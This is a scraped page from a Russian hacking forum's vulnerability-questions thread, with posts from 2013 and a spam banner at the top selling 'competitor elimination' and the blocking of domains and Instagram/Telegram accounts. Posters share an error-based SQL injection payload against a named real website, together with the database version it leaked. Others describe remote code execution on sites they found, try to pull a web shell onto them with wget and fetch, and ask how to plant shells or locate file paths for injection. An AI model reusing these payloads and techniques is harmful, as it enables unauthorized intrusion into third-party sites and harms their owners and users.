УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2250 из 2438

2250

Опции темы

Поиск в этой теме

Опции просмотра

#22491

31.05.2013, 16:46

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от lessmore

lessmore said:
But how?
http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=%bf'%bf"

It's all very simple

_http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=1%22and(select (1)from(select(count(*)),concat((select(version()) from(information_schema.tables)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and%22

Duplicate entry '5.0.95' for key 1 Error no:1062

#22492

04.06.2013, 09:58

z0mbie86

Новичок

Регистрация: 25.07.2009

Сообщений: 10

Провел на форуме:
71531

Репутация: 0

В web.config нашел такую строчку

Как подключится? Я так понял через клиент oracle, если да то где скачать клиент и как подключится?

#22493

05.06.2013, 14:04

Br@!ns

Guest

Сообщений: n/a

Провел на форуме:
179197

Репутация: 25

Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?

#22494

05.06.2013, 15:26

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от Br@!ns

Br@!ns said:
Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?

ну да, как и всегда стандартыми методами

#22495

05.06.2013, 17:21

Ups

Guest

Сообщений: n/a

Провел на форуме:
42754

Репутация: 0

Нашел сайт с RCE.

Ввожу: wget http://site.ru/shell.php

Выдает:

Цитата:

Сообщение от None

Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@mail.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

С curl'ом такая же проблема.

Если написать просто wget:

Цитата:

Сообщение от None

Usage: wget [OPTION..и т.д

Остальные команды (rm\ls -la\etc) выполняет нормально.

Могу создавать файлы. Правда если:

echo > 1.php

то:

500 Internal Server Error

#22496

05.06.2013, 18:20

z0mbie86

Новичок

Регистрация: 25.07.2009

Сообщений: 10

Провел на форуме:
71531

Репутация: 0

Цитата:

Сообщение от OxoTnik

OxoTnik said:
Программа
Navicat Premium

вот такую ошибку выдает

#22497

05.06.2013, 20:16

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от Ups

Ups said:
Нашел сайт с RCE.
Ввожу: wget http://site.ru/shell.php
Выдает:
С curl'ом такая же проблема.
Если написать просто wget:
Остальные команды (rm\ls -la\etc) выполняет нормально.
Могу создавать файлы. Правда если:
echo > 1.php
то:
500 Internal Server Error

echo "" > 1.php

и убедись, что есть права на запись.

#22498

05.06.2013, 20:32

Ups

Guest

Сообщений: n/a

Провел на форуме:
42754

Репутация: 0

Цитата:

Сообщение от OxoTnik

OxoTnik said:
попробуй через
fetch

Код:

Code:
fetch http://site.ru/shell.php

Выполнилось..но и ничего не закачалось.

#22499

05.06.2013, 20:55

Ups

Guest

Сообщений: n/a

Провел на форуме:
42754

Репутация: 0

Цитата:

Сообщение от OxoTnik

OxoTnik said:
скинь в ЛС помогу, или в icq мне напиши но скорее всего нет прав,
проверить можно указав пути
Пример
system("cd /tmp/;ls -al");

Код:

Code:
ls -al /tmp/

Fatal error: Allowed memory size of 50331648 bytes exhausted (tried to allocate 700 bytes)

В аську отписал.

#22500

06.06.2013, 00:45

stan_q

Новичок

Регистрация: 01.08.2009

Сообщений: 12

Провел на форуме:
104424

Репутация: 0

Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.

Страница 2250 из 2438

2250

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход